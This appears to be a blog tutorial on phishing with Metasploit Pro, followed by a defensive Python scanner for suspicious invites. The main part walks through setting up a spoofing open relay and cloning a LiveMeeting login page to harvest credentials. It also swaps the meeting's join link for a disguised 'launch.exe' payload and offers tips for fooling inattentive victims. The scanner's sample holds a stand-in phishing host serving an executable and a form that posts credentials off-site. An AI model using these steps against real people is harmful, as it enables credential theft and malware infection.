Social Engineering with Metasploit Pro!

Skill level: Novice

What you need:

– Light html editing skills
– Some place to host a file
– Can-do attitude

Since its release last month (and before that, during the beta) I have been mucking about with some of the more advanced features included in Metasploit Professional. Being a deviant (in a past life), the most logical place to go first would be social engineering.

Today we are going to create a 3-pronged social engineering campaign leveraging Microsoft’s LiveMeeting as a platform. You can use whatever input floats your boat, but it’s best to use something that requires a local download of some sort. Pro provides a great framework for real-world web and email phishing, as well as a platform for security awareness training internally. Creation of the overall engagement is very straightforward in Pro, but there are a few extra things you can do to make it far more effective. I’ve created an example of how to use this functionality.

I started off by creating a new project. For those of you not familiar with Pro, it will look alien to you at first. A GUI-based Metasploit? I say! Blasphemous! Unheard of!

Meh, stick with me…

If you’ve seen Metasploit Express before then this won’t look quite so radical, but you will notice a few new tabs across the top =].

Before I got started with the Campaign, there were a few prerequisites I needed to get out of the way. In order to run an email phishing campaign, I first needed an open relay to send my emails through so they could look like they were coming from LiveMeeting and not me. There are lots of open relays available on the internet (here’s a list I got from a buddy, unverified and some are blacklisted), but best practice is to get one from your ISP or create a little sendmail server yourself, which is what I did. I had heard many horror stories about how difficult Sendmail could be to configure correctly, but I didn’t have any trouble with this instance. The easiest way to do it: pick a Linux box (it can be the same one running Metasploit if you want) and run this command from a root terminal:

root@pracpwn:~# apt-get install sendmail

This will install the sendmail server and start it; this will be our open relay. Next, I needed a way to manage it, because I sure as hell wasn’t doing it by command line. So I got Webmin from webmin.com. I have a Debian distro (Ubuntu 10.04), so I grabbed the Debian package. Once I got that installed, I browsed to:

<ip where you installed webmin and sendmail>:10000

If everything installed correctly, you will get a prompt that looks like this:

I logged in using the credentials I use to log into my machine.

Next, I took off all the security to actually make my relay open. After all was said and done, I went back and turned on a few aspects like authentication, SSL, etc., but to get started I find it’s best to just get it working first =]. To do that I opened up the sendmail settings and set everything to just run on port 25.

From here, click on Network Ports and check the default radio button as shown:

Save it, and now we’re ready to get into Metasploit Pro!

I then created a new Campaign. Once created, I chose all 3 types: Web, Email, and USB with this config:

Doesn’t really matter what you call the project, but I wanted to match the filename and from address as closely as possible to what a victim would be expecting. From here, I just clicked save and moved on to the web config.

This part was ridiculously easy. All I did was browse to my LiveMeeting login page (or your target page of choice), copy the page source and paste it into the HTML field. I have done this for several pages, and Pro is very consistent at being able to render these properly. For more advanced pwnage, you can also go in and modify the code to harvest usernames and passwords, as well as make one of the buttons download a payload. By default, Pro starts a browser exploit onslaught as soon as the victim browses to this page. Of course, we don’t even need a web template if we can get it done with an email template.

I applied the same concept to my email template config as my web one… grabbed an Outlook invite with LiveMeeting info, copied the HTML from the invite and pasted it into the HTML field.

(Note: for calendar invites, Outlook doesn’t let you copy the HTML directly, so I copied the contents of the email and pasted them into NVU first (an open source HTML editor). From there I converted the email to HTML and copied the HTML from there back into Pro.)

From here I looked through the HTML for the link to the actual LiveMeeting (mine was called “Click to Join LiveMeeting”). I took note of this location and hit save.

Next was the list of email addresses. I didn’t have one at the time, so I just put in my gmail address as a test to make sure it works.

Now back at the main campaign page, I had everything set up. The only question was what to do with my new executable, so I decided to make my email template a little more potent. I created a directory structure on one of my hosted servers (livemeeting/meetings) and uploaded my executable to it so that it’s always available. The directory structure wasn’t necessary, but it makes the download look a little more authentic. Then I dug back into my email template config.

Remembering where my link was, I changed the href from the LiveMeeting site to redirect to my executable so it downloads. Since I named it “launch.exe”, it looks very similar to the “launch.rtc” file downloaded automatically by LiveMeeting. It doesn’t look exactly the same, but you’d be surprised how many people don’t really pay attention =].

So now I save that, enter my email addresses, run the campaign, sit back and wait for the sessions! Huzzah!
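From the other side of the fence: the two edits that make this campaign work (a join link rewritten to fetch an executable, and a cloned login form that posts somewhere else) are exactly what mail-gateway triage should catch. The following scanner is an added example, not part of the original post or of Metasploit Pro; the `LEGIT_HOSTS` value and the sample invite are assumptions constructed for the demo.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

EXEC_EXTS = (".exe", ".msi", ".scr", ".hta", ".vbs")
LEGIT_HOSTS = ("livemeeting.com",)   # assumed: where a real join link should point

class InviteScanner(HTMLParser):
    """Collects anchors (href, visible text) and form actions from an HTML email."""
    def __init__(self):
        super().__init__()
        self.links, self.forms, self._cur = [], [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self._cur = [a["href"], ""]
        elif tag == "form":
            self.forms.append(a.get("action", ""))
    def handle_data(self, data):
        if self._cur is not None:
            self._cur[1] += data
    def handle_endtag(self, tag):
        if tag == "a" and self._cur is not None:
            self.links.append((self._cur[0], " ".join(self._cur[1].split())))
            self._cur = None

def is_legit_host(url):
    host = (urlparse(url).hostname or "").lower()
    return any(host == h or host.endswith("." + h) for h in LEGIT_HOSTS)

def scan_invite(html_text):
    """Return (reason, url) findings for the rewrites a phishing invite relies on."""
    p = InviteScanner()
    p.feed(html_text)
    findings = []
    for href, text in p.links:
        if urlparse(href).path.lower().endswith(EXEC_EXTS):
            findings.append(("join link downloads an executable", href))
        if "livemeeting" in text.lower() and not is_legit_host(href):
            findings.append(("join link leaves the claimed domain", href))
    for action in p.forms:
        if action and not is_legit_host(action):   # empty action = same origin
            findings.append(("login form posts credentials off-site", action))
    return findings

# Constructed sample invite: join link rewritten to fetch launch.exe from a
# look-alike path on an unrelated host, plus a cloned login form posting there.
SAMPLE_INVITE = """<html><body><p>Join the meeting:</p>
<a href="http://phish.example.net/livemeeting/meetings/launch.exe">Click to Join LiveMeeting</a>
<form action="http://phish.example.net/livemeeting/login"><input name="password"></form>
</body></html>"""
```

Run `scan_invite` over the HTML body of an incoming invite; an unmodified invite whose join link stays on the claimed domain returns no findings.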

Keep in mind this is a very basic setup for social engineering; there are many other cool things you can do with this functionality combined with other technologies, both in and out of Metasploit, that I will write up when I have some time. Until then, enjoy!
